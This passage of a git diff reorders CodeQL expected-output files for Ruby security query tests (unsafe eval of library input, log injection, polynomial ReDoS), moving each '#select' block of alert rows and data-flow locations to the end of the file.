| impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | -| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | edges | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | provenance | | | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | provenance | | 
@@ -73,3 +61,15 @@ nodes | impl/unsafeCode.rb:63:30:63:30 | y | semmle.label | y | | impl/unsafeCode.rb:64:10:64:13 | arr2 | semmle.label | arr2 | subpaths +#select +| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | +| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | +| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. 
| impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | +| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected index 123b65ba6767..85299a98c289 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected 
@@ -1,11 +1,3 @@ -#select -| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:49:19:49:30 | ...[...] 
| app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | edges | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | provenance | | | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | provenance | | 
@@ -50,3 +42,11 @@ nodes | app/controllers/users_controller.rb:49:19:49:24 | call to params | semmle.label | call to params | | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | semmle.label | ...[...] | subpaths +#select +| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... 
| Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:49:19:49:30 | ...[...] | app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected index 7d333ca4dbaa..79d6c72fa3f5 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected 
@@ -1,32 +1,3 @@ -#select -| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:28:5:28:21 | call to gsub! | PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | -| PolynomialReDoS.rb:30:5:30:18 | call to slice! 
| PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | -| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | -| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | -| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. 
| lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | -| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | edges | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:10:5:10:8 | name | provenance | | | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:11:5:11:8 | name | provenance | | 
@@ -133,3 +104,32 @@ nodes | lib/index.rb:9:15:9:15 | x | semmle.label | x | | lib/index.rb:11:16:11:16 | x | semmle.label | x | subpaths +#select +| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:28:5:28:21 | call to gsub! 
| PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | +| PolynomialReDoS.rb:30:5:30:18 | call to slice! | PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | +| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | +| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. 
